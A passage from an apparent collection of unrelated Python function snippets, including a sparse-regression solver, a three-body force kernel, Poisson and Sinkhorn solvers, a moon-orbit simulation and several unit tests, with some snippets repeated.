w[i][j] = relaxationVars.w[i][j]\n else:\n # Important: we need w[i][j] = 0 if T_{ij} if fixed (this is\n # due to the thresholding function)\n w[i][j] = 0\n\n sortedIndices = {i: sorted(w[i]) for i in w}\n sortedIndices = defaultdict(list, sortedIndices)\n\n # Prepare all the fixed matrices/vectors required for grad evaluation\n # later.\n XBty = np.dot(XB.T, y)\n XBtXB = np.dot(XB.T, XB)\n XTty = np.dot(XT.T, y)\n XTtXT = np.dot(XT.T, XT)\n XBtXT = np.dot(XB.T, XT)\n\n # Compute the lipschitz constant of the grad.\n Xfull = np.hstack((XB, XT))\n if Xfull.shape[1] != 0:\n eigvals, v = np.linalg.eig(np.dot(Xfull.T, Xfull))\n L = np.max(np.real(eigvals))\n else:\n L = 1 # any value here should suffice - it's not used.\n\n # Compute the lipschitz constants for BCD.\n LCD = {}\n for i in Bindices:\n LCD[i] = (len(w[i]) + 1) * ((Lambda0**2) / (L * M**2))\n\n # Define the thresholding constants\n frac = Lambda0 / (M * L)\n Mpfrac = M + frac\n frac1 = Lambda1 / (M * L)\n Mpfrac1 = M + frac1\n fracsqL = frac * frac * L\n LambdaovM = Lambda0 / M\n Lambda1ovM = Lambda1 / M\n Lambda1ovLambda0 = Lambda1 / Lambda0\n\n start = time.time()\n\n oldObj = math.inf\n for it in range(5000):\n grad_B = - XBty + np.dot(XBtXB, currentB) + np.dot(XBtXT, currentT)\n grad_T = - XTty + np.dot(XTtXT, currentT) + np.dot(XBtXT.T, currentB)\n Bstar = currentB - grad_B / L\n Tstar = currentT - grad_T / L\n # Iterate over the blocks, running dual BCD.\n # We employ dual warm starts by using the same (u,w) across the PGD updates.\n CDPrevObj = -math.inf\n LCDCurrent = copy(LCD)\n useZeroSuffCondition = True\n if useZeroSuffCondition:\n # Perform proximal screening below.\n zeroGroups = set()\n for i in Bfree:\n zeroSufficient = False\n cumsum = 0\n for j in w[i]:\n thrshld = max(\n (abs(Tstar[Tmap[(i, j)]]) / frac - Lambda1ovLambda0), 0)\n # Do feature level screening below.\n if thrshld == 0:\n # The initialization below ensures that \\theta_{ij} is\n # never updated by BCA.\n w[i][j] = 0\n w[j][i] = 0\n else:\n cumsum += thrshld\n\n if cumsum <= 1 - abs(Bstar[Bmap[i]]) / frac:\n zeroSufficient = True\n if zeroSufficient:\n u[i] = Bstar[Bmap[i]] / frac\n for j in w[i]:\n if abs(Tstar[Tmap[(i, j)]]) > frac1:\n w[i][j] = Tstar[Tmap[(\n i, j)]] / frac - Lambda1ovLambda0 * np.sign(Tstar[Tmap[(i, j)]])\n else:\n w[i][j] = 0\n w[j][i] = 0\n # Not nec. but can improve speed.\n LCDCurrent[j] -= (Lambda0**2) / (L * M**2)\n zeroGroups.add(i)\n\n BfreeMinusZeroGroups = [i for i in Bfree if i not in zeroGroups]\n CDObjConst = 0\n '''\n for i in zeroGroups:\n CDObjConst += q(u[i], Bstar[Bmap[i]], M, Lambda0, L,frac)\n for j in w[i]:\n if i < j:\n # T(wij, wji, thetaij, M, Lambda0, L, frac, frac1, Mpfrac1, LambdaovM, Lambda1ovM)\n CDObjConst += T(w[i][j], w[j][i], Tstar[Tmap[(i,j)]], M, Lambda0, L,frac, frac1, Mpfrac1, LambdaovM, Lambda1ovM)\n '''\n ####\n else:\n zeroGroups = set()\n CDObjConst = 0\n BfreeMinusZeroGroups = Bfree\n # To Turn the part above off, comment it out and set the following:\n # zeroGroups = set()\n # CDObjConst = 0\n # BfreeMinusZeroGroups = Bfree\n\n for innerit in range(10000):\n # for i in Bfree:\n for i in BfreeMinusZeroGroups:\n # First, Calculate utilde and wtilde for ith block\n utilde = u[i] + delq(u[i],\n Bstar[Bmap[i]],\n M,\n Lambda0,\n L,\n frac,\n Mpfrac,\n fracsqL,\n LambdaovM) / LCDCurrent[i]\n\n #wtilde = {}\n # for j in w[i]:\n # if B_j is fixed to 1, then we already set w[j][i] = 0\n # wtilde[j] = w[i][j] + delT(w[i][j], w[j][i], Tstar[Tmap[(i,j)]], M, Lambda0, L,frac, Mpfrac, fracsqL, LambdaovM)/LCD[i]\n sortedIndicesi = sortedIndices[i]\n # delT(wij, wji, thetaij, M, Lambda0, L, frac, frac1, Mpfrac1, LambdaovM)\n wtilde = [w[i][j] + delT(w[i][j],\n w[j][i],\n Tstar[Tmap[(i,\n j)]],\n M,\n Lambda0,\n L,\n frac,\n frac1,\n Mpfrac1,\n LambdaovM) / LCDCurrent[i] for j in sortedIndicesi]\n\n x = np.empty(shape=len(wtilde) + 1)\n # Solve the l1 projection problem.\n x[0] = utilde\n x[1:] = np.array(wtilde)\n projection = project(x)\n # Update the solution.\n u[i] = projection[0]\n # for j in range(len(w[i])):\n # w[i][sortedIndicesi[j]] = projection[j+1] ## +1 since u[i] is\n # first\n for counter, j in enumerate(sortedIndicesi):\n w[i][j] = projection[counter + 1]\n # Calculate the current objective\n CDObj = CDObjConst # 0\n for i in BfreeMinusZeroGroups: # Bfree:\n CDObj += q(u[i], Bstar[Bmap[i]], M, Lambda0, L, frac)\n for j in w[i]:\n if i < j:\n # T(wij, wji, thetaij, M, Lambda0, L, frac, frac1, Mpfrac1, LambdaovM, Lambda1ovM)\n CDObj += T(w[i][j], w[j][i], Tstar[Tmap[(i, j)]], M,\n Lambda0, L, frac, frac1, Mpfrac1, LambdaovM, Lambda1ovM)\n #Params[\"print\"](\"Inner obj: \", CDObj)\n if terminate(CDPrevObj, CDObj, TolCD):\n break\n CDPrevObj = CDObj\n\n # Get back the primal solution.\n for i in range(len(Bindices)):\n # if Bindices[i] is fixed to 1, then u[Bindices[i]] = 0 and the\n # update below will lead to currentB[i] = Bstar[i] (or +- M)\n if Bindices[i] not in zeroGroups:\n # assuming Bindices is sorted\n currentB[i] = dualtoprimalu(\n u[Bindices[i]], Bstar[i], M, Lambda0, L, frac)\n else:\n currentB[i] = 0\n\n for i, j in Tmap:\n # if i or j is fixed, the corresponding w[i][j] will be zero, which\n # leads to the correct update.\n if i < j:\n if (i, j) in Tfree:\n # dualtoprimalw(wij, wji, thetaij, M, Lambda0, L, frac, frac1, Mpfrac1)\n if i in zeroGroups or j in zeroGroups:\n currentT[Tmap[(i, j)]] = 0\n else:\n currentT[Tmap[(i, j)]] = dualtoprimalw(\n w[i][j], w[j][i], Tstar[Tmap[(i, j)]], M, Lambda0, L, frac, frac1, Mpfrac1)\n else: # careful, this is the case when no thresholding should be applied\n coefficient = Tstar[Tmap[(i, j)]]\n if np.abs(coefficient) <= M:\n currentT[Tmap[(i, j)]] = coefficient\n else:\n currentT[Tmap[(i, j)]] = M * np.sign(coefficient)\n\n r = y - np.dot(XB, currentB) - np.dot(XT, currentT)\n\n maxterm = 0\n for i in range(len(currentB)):\n if Bindices[i] not in fixedB:\n maxtemp = np.abs(currentB[i])\n for j in w[Bindices[i]]:\n maxtemp = max(maxtemp, np.abs(\n currentT[Tmap[(Bindices[i], j)]]))\n maxterm += maxtemp\n l1norm = np.sum(np.abs(currentT[TfreeIndices]))\n # IMPORTANT: Avoid using lenFixed and lenFixedT here.....!!!!!! ####\n currentobjective = 0.5 * np.dot(r, r) + Lambda0 * (\n lenFixedB + lenFixedT) + (Lambda0 / M) * maxterm + (Lambda1 / M) * l1norm\n\n if currentobjective > oldObj:\n Params[\"print\"](\"Objective Increased!!!\")\n\n if terminate(oldObj, currentobjective, Tol):\n break\n\n oldObj = currentobjective\n Params[\"print\"](\"Iteration :\", it, \". Objective: \", currentobjective)\n\n end = time.time()\n Params[\"print\"](\"Time: \", end - start, \" seconds.\")\n\n # Check if any small values should be zero.\n # Start with more aggressive checks first.\n Trunc = False\n for epsilon in [0.01, 1e-3, 1e-4, 1e-5, 1e-6]:\n currentBtrunc = np.copy(currentB)\n currentTtrunc = np.copy(currentT)\n currentBSetToZero = np.nonzero(np.abs(currentB) < epsilon)[0]\n currentBtrunc[currentBSetToZero] = 0\n currentBSetToZeroPSet = set(currentBSetToZero)\n for (i, j) in Tmap:\n if Bmap[i] in currentBSetToZeroPSet or Bmap[j] in currentBSetToZeroPSet:\n currentTtrunc[Tmap[(i, j)]] = 0\n\n currentTtrunc[np.abs(currentT) < epsilon] = 0\n rtrunc = y - np.dot(XB, currentBtrunc) - np.dot(XT, currentTtrunc)\n maxterm = 0\n for i in range(len(currentBtrunc)):\n if Bindices[i] not in fixedB:\n maxtemp = np.abs(currentBtrunc[i])\n for j in w[Bindices[i]]:\n maxtemp = max(maxtemp, np.abs(\n currentTtrunc[Tmap[(Bindices[i], j)]]))\n maxterm += maxtemp\n l1norm = np.sum(np.abs(currentTtrunc[TfreeIndices]))\n objectivetrunc = 0.5 * np.dot(rtrunc, rtrunc) + Lambda0 * (\n lenFixedB + lenFixedT) + (Lambda0 / M) * maxterm + (Lambda1 / M) * l1norm\n\n Params[\"print\"](\n \"eps: \",\n epsilon,\n \" objectivetrunc: \",\n objectivetrunc,\n \" currentobjective: \",\n currentobjective)\n # 1.01 might be beneficial in some extreme cases where supp becomes\n # very large (but might also cause descent problems)\n if objectivetrunc <= currentobjective:\n '''\n currentB = currentBtrunc\n currentT = currentTtrunc\n r = rtrunc\n currentobjective = objectivetrunc\n '''\n Params[\"print\"](\"###CHANGE###\", \"eps: \", epsilon)\n Params[\"print\"](\"Final Objective :\", objectivetrunc)\n Trunc = True\n break\n\n integral = True\n\n for i in Bfree:\n zi = np.abs(currentB[Bmap[i]]) / M\n if zi > 0 and zi < 0.999:\n integral = False\n\n for i in TfreeIndices:\n zi = np.abs(currentT[i]) / M\n if zi > 0 and zi < 0.999:\n integral = False\n\n Bnnz = {key: currentB[Bmap[key]]\n for key in Bmap if currentB[Bmap[key]] != 0}\n Tnnz = {(i, j): currentT[Tmap[(i, j)]]\n for i, j in Tmap if i < j and currentT[Tmap[(i, j)]] != 0}\n intercept = data.ybar - np.dot(XBMean, currentB) - np.dot(XTMean, currentT)\n sol = Solution(Bnnz, Tnnz, intercept)\n\n if Trunc:\n BnnzTrunc = {key: currentBtrunc[Bmap[key]]\n for key in Bmap if currentBtrunc[Bmap[key]] != 0}\n TnnzTrunc = {(i, j): currentTtrunc[Tmap[(\n i, j)]] for i, j in Tmap if i < j and currentTtrunc[Tmap[(i, j)]] != 0}\n interceptTrunc = data.ybar - \\\n np.dot(XBMean, currentBtrunc) - np.dot(XTMean, currentTtrunc)\n solTrunc = Solution(BnnzTrunc, TnnzTrunc, interceptTrunc)\n else:\n BnnzTrunc = Bnnz\n TnnzTrunc = Tnnz\n interceptTrunc = intercept\n solTrunc = sol\n\n return (sol, solTrunc, currentobjective, integral, r, u, w)", "def three_body_mc_force_en_jit(bond_array_1, c1, etypes1,\n bond_array_2, c2, etypes2,\n cross_bond_inds_1, cross_bond_inds_2,\n cross_bond_dists_1, cross_bond_dists_2,\n triplets_1, triplets_2,\n d1, sig, ls, r_cut, cutoff_func,\n nspec, spec_mask, triplet_mask):\n\n kern = 0\n\n # pre-compute constants that appear in the inner loop\n sig2 = sig * sig\n ls1 = 1 / (2 * ls * ls)\n ls2 = 1 / (ls * ls)\n\n bc1 = spec_mask[c1]\n bc1n = nspec * nspec * bc1\n\n for m in range(bond_array_1.shape[0]):\n ri1 = bond_array_1[m, 0]\n ci1 = bond_array_1[m, d1]\n fi1, fdi1 = cutoff_func(r_cut, ri1, ci1)\n ei1 = etypes1[m]\n\n bei1 = spec_mask[ei1]\n bei1n = nspec * bei1\n\n for n in range(triplets_1[m]):\n ind1 = cross_bond_inds_1[m, m + n + 1]\n ri2 = bond_array_1[ind1, 0]\n ci2 = bond_array_1[ind1, d1]\n fi2, fdi2 = cutoff_func(r_cut, ri2, ci2)\n ei2 = etypes1[ind1]\n\n bei2 = spec_mask[ei2]\n\n ttypei = triplet_mask[bc1n + bei1n + bei2]\n\n tls1 = ls1[ttypei]\n tls2 = ls2[ttypei]\n tsig2 = sig2[ttypei]\n\n ri3 = cross_bond_dists_1[m, m + n + 1]\n fi3, _ = cutoff_func(r_cut, ri3, 0)\n\n fi = fi1 * fi2 * fi3\n fdi = fdi1 * fi2 * fi3 + fi1 * fdi2 * fi3\n\n for p in range(bond_array_2.shape[0]):\n rj1 = bond_array_2[p, 0]\n fj1, _ = cutoff_func(r_cut, rj1, 0)\n ej1 = etypes2[p]\n\n for q in range(triplets_2[p]):\n ind2 = cross_bond_inds_2[p, p + q + 1]\n rj2 = bond_array_2[ind2, 0]\n fj2, _ = cutoff_func(r_cut, rj2, 0)\n ej2 = etypes2[ind2]\n rj3 = cross_bond_dists_2[p, p + q + 1]\n fj3, _ = cutoff_func(r_cut, rj3, 0)\n fj = fj1 * fj2 * fj3\n\n r11 = ri1 - rj1\n r12 = ri1 - rj2\n r13 = ri1 - rj3\n r21 = ri2 - rj1\n r22 = ri2 - rj2\n r23 = ri2 - rj3\n r31 = ri3 - rj1\n r32 = ri3 - rj2\n r33 = ri3 - rj3\n\n if (c1 == c2):\n if (ei1 == ej1) and (ei2 == ej2):\n kern += three_body_en_helper(ci1, ci2, r11, r22,\n r33, fi, fj, fdi,\n tls1,\n tls2, tsig2)\n if (ei1 == ej2) and (ei2 == ej1):\n kern += three_body_en_helper(ci1, ci2, r12, r21,\n r33, fi, fj, fdi,\n tls1,\n tls2, tsig2)\n if (c1 == ej1):\n if (ei1 == ej2) and (ei2 == c2):\n kern += three_body_en_helper(ci1, ci2, r13, r21,\n r32, fi, fj, fdi,\n tls1,\n tls2, tsig2)\n if (ei1 == c2) and (ei2 == ej2):\n kern += three_body_en_helper(ci1, ci2, r11, r23,\n r32, fi, fj, fdi,\n tls1,\n tls2, tsig2)\n if (c1 == ej2):\n if (ei1 == ej1) and (ei2 == c2):\n kern += three_body_en_helper(ci1, ci2, r13, r22,\n r31, fi, fj, fdi,\n tls1,\n tls2, tsig2)\n if (ei1 == c2) and (ei2 == ej1):\n kern += three_body_en_helper(ci1, ci2, r12, r23,\n r31, fi, fj, fdi,\n tls1,\n tls2, tsig2)\n\n return kern", "def main():\n moons = initialize_moons()\n\n # Do it again, to get a stable initial set of values to compare against.\n initial_state = initialize_moons()\n needed_cycles = [0] * 3\n\n # Because in the mechanics of this fake universe gravity and velocity in\n # one dimension do not affect anything in the other two dimensions, we\n # can loop altering one dimension at a time until\n for dimension in (Position3d.X, Position3d.Y, Position3d.Z):\n Position3d.set_dimension(dimension)\n cycled = False\n cycle_count = 0\n while not cycled:\n if cycle_count > 30000000000:\n print(\"bailing!\")\n break\n cycle_count += 1\n for moon in moons:\n for other_moon in moons:\n if moon is other_moon:\n continue\n moon.apply_gravity(other_moon)\n for moon in moons:\n moon.apply_velocity()\n match = True\n for idx, moon in enumerate(moons):\n if moon != initial_state[idx]:\n # Didn't complete a cycle back to original state for this\n # dimension. Try again.\n match = False\n break\n if match:\n # Yea! Done with this dimension\n needed_cycles[dimension] = cycle_count\n cycled = True\n\n print(lcm(needed_cycles[2], lcm(needed_cycles[0], needed_cycles[1])),\n \"cycles needed to loop.\")\n print(\"Hawking would be proud.\")", "def test_linear_in_cond(self):\n # reproducible arbitrariness\n np.random.seed(3232)\n\n cond_out = np.random.randn(self.Nc)\n alpha = 2.3\n\n self.conductor.out_step = np.copy(cond_out)\n self.tutor.out_step = self.rule.theta + 10*np.random.randn(self.Ns)\n\n W0 = np.copy(self.syns.W)\n\n sim = simulation.Simulation(self.conductor, self.student, self.tutor,\n self.syns, self.rule, dt=self.dt)\n sim.run(self.dt)\n\n change1 = self.syns.W - W0\n\n self.syns.W = np.copy(W0)\n self.conductor.out_step = alpha*cond_out\n sim.run(self.dt)\n\n change2 = self.syns.W - W0\n\n self.assertTrue(np.allclose(change2, alpha*change1))", "def test_linear_in_cond(self):\n # reproducible arbitrariness\n np.random.seed(3232)\n\n cond_out = np.random.randn(self.Nc)\n alpha = 2.3\n\n self.conductor.out_step = np.copy(cond_out)\n self.tutor.out_step = self.rule.theta + 10*np.random.randn(self.Ns)\n\n W0 = np.copy(self.syns.W)\n\n sim = simulation.Simulation(self.conductor, self.student, self.tutor,\n self.syns, self.rule, dt=self.dt)\n sim.run(self.dt)\n\n change1 = self.syns.W - W0\n\n self.syns.W = np.copy(W0)\n self.conductor.out_step = alpha*cond_out\n sim.run(self.dt)\n\n change2 = self.syns.W - W0\n\n self.assertTrue(np.allclose(change2, alpha*change1))", "def __ge__(self, *args):\n return _ida_hexrays.cwhile_t___ge__(self, *args)", "def potentialSolver3(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def potentialSolver3(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def body_fn(iteration, const, state, compute_error):\n geom, a, b, _ = const\n errors, f_u, g_v = state\n\n # compute momentum term if needed, using previously seen errors.\n w = jax.lax.stop_gradient(jnp.where(iteration >= (\n inner_iterations * chg_momentum_from + min_iterations),\n get_momentum(errors, chg_momentum_from),\n momentum_default))\n\n # sinkhorn updates using momentum, in either scaling or potential form.\n if lse_mode:\n new_g_v = tau_b * geom.update_potential(f_u, g_v, jnp.log(b),\n iteration, axis=0)\n g_v = (1.0 - w) * jnp.where(jnp.isfinite(g_v), g_v, 0.0) + w * new_g_v\n\n new_f_u = tau_a * geom.update_potential(f_u, g_v, jnp.log(a),\n iteration, axis=1)\n f_u = (1.0 - w) * jnp.where(jnp.isfinite(f_u), f_u, 0.0) + w * new_f_u\n else:\n new_g_v = geom.update_scaling(f_u, b, iteration, axis=0) ** tau_b\n g_v = jnp.where(g_v > 0, g_v, 1) ** (1.0 - w) * new_g_v ** w\n\n new_f_u = geom.update_scaling(g_v, a, iteration, axis=1) ** tau_a\n f_u = jnp.where(f_u > 0, f_u, 1) ** (1.0 - w) * new_f_u ** w\n\n # re-computes error if compute_error is True, else set it to inf.\n err = jnp.where(\n jnp.logical_and(compute_error, iteration >= min_iterations),\n marginal_error(geom, a, b, tau_a, tau_b, f_u, g_v, norm_error,\n lse_mode),\n jnp.inf)\n\n errors = jax.ops.index_update(\n errors, jax.ops.index[iteration // inner_iterations, :], err)\n return errors, f_u, g_v", "def test_velocity_boundaries(self):\n L_x = self.x_edge[-1]\n np.testing.assert_array_almost_equal(self.v_box(self.t, 0), 0, decimal=4)\n np.testing.assert_array_almost_equal(self.v_box(self.t, L_x), 0, decimal=4)", "def _sinkhorn_iterations_implicit_bwd(\n tau_a, tau_b, inner_iterations, min_iterations, max_iterations,\n momentum_default, chg_momentum_from, lse_mode, implicit_differentiation,\n res, gr) -> Tuple[Any, Any, geometry.Geometry, jnp.ndarray, jnp.ndarray]:\n del inner_iterations, min_iterations, max_iterations, momentum_default\n del chg_momentum_from, implicit_differentiation\n f, g, geom, a, b = res\n f_g = jnp.concatenate((f, g))\n # Ignores gradients info with respect to 'errors' output.\n gr = gr[0], gr[1]\n ridge = 1e-10 # to regularize the linear system in implicit function diff\n\n if lse_mode:\n marginal_a = lambda geom, f, g: geom.marginal_from_potentials(f, g, 1)\n marginal_b = lambda geom, f, g: geom.marginal_from_potentials(f, g, 0)\n else:\n marginal_a = lambda geom, f, g: geom.marginal_from_scalings(\n geom.scaling_from_potential(f), geom.scaling_from_potential(g), 1)\n\n marginal_b = lambda geom, f, g: geom.marginal_from_scalings(\n geom.scaling_from_potential(f), geom.scaling_from_potential(g), 0)\n\n n, _ = geom.shape\n\n def first_order_conditions(geom: geometry.Geometry,\n a: jnp.ndarray,\n b: jnp.ndarray,\n fg: jnp.ndarray):\n \"\"\"Computes vector of first order conditions for the reg-OT problem.\n\n The output of this vector should be close to zero at optimality.\n Upon completion of the Sinkhorn forward pass, its norm (as computed using\n the norm_error setting) should be below the threshold parameter.\n\n This error will be itself assumed to be close to zero when using implicit\n differentiation.\n\n Args:\n geom: a geometry object\n a: jnp.ndarray, first marginal\n b: jnp.ndarray, second marginal\n fg: concatenated vector of two potentials (total size equals the sum of\n that of a and b)\n Returns:\n a jnp.ndarray of the size of fg quantifying deviation from optimality.\n \"\"\"\n grad_a, grad_b = grad_of_marginal_fit(\n a, b, fg[:n], fg[n:], tau_a, tau_b, geom)\n return jnp.concatenate((\n jnp.where(a > 0,\n marginal_a(geom, fg[:n], fg[n:]) - grad_a,\n 0.0),\n jnp.where(b > 0,\n marginal_b(geom, fg[:n], fg[n:]) - grad_b,\n 0.0)\n ))\n\n foc_fg = lambda fg: first_order_conditions(geom, a, b, fg)\n foc_geom_a_b = lambda geom, a, b: first_order_conditions(geom, a, b, f_g)\n\n # Carries out implicit differentiation of F.O.C. using inversion of VJP\n # computed here using automatic differentiation of the F.O.C vector.\n _, pull_fg = jax.vjp(foc_fg, jnp.where(jnp.isfinite(f_g), f_g, 0))\n # 